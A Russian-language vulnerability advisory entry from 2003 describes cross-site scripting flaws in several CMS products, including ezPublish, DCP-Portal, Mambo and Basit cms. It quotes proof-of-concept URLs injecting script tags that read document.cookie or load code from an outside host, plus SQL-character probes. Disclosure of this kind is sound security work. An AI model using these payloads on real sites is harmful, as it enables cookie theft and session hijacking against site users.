| Дата публикации: | 25.03.2003 |
| Всего просмотров: | 2086 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость в проверке правильности ввода обнаружена в нескольких CMS системах (ezPublish, DCP-Portal, Nuked-klan, Siteframe, Mambo Site Server, Basit cms). Удаленный пользователь может выполнить XSS нападение.
Ertan Kurt попытался найти безопасную CMS систему для своего сайта. В результате поиска, он обнаружил несколько XSS уязвимостей во многих популярных CMS системах. Пример:
ezPublish 2.2.7
http://target/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</sc
ript>
also when entered an URL like
http://target/<script>alert('test')</script> and site admin checks
latest served URLs the script will run
Vendor Site: http://www.ez.no
DCP-Portal v5.3.1
http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></scrip
t>
http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&
day=05
Vendor Site: http://www.dcp-portal.org
Nuked-klan 1.3b
it doesn work if it starts with <script but by adding a "> the script will run
http://target/index.php?file=Liens&op="><script>alert('test');</script>
Vendor Site: http://www.nuked-klan.org
Siteframe 2.2.4
Same "> issue here
http://target/search.php?searchfor="><script>alert('test');</script>
http://target/download.php?id=2% (shows some info)
Vendor Site: http://www.siteframe.org
Mambo Site Server 4.0 build 10
http://target/index.php?option=search&searchword=<script>alert(document.cookie);</script>
Vendor Site: http://www.mamboserver.com
Basit cms 1.0
Content module: // Some sql chars and unwanted behaviour (loop->DoS?)
http://target/modules/Content/?op=sec&s=--
http://target/modules/Content/?op=sec&s='
http://target/modules/Content/?op=sec&s=;
Submit module:
http://target/modules/Submit/index.php?op=pre&title=<script%20src="http://othersite/code.
js">test</script>
http://target/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</scr
ipt>
Search module:
http://target/modules/Search/index.php?q="><script+src=http://othersite/code.js></sc
ript>&op=search
Vendor Site: http://basitonline.com
|
| Ссылки: | Some XSS vulns |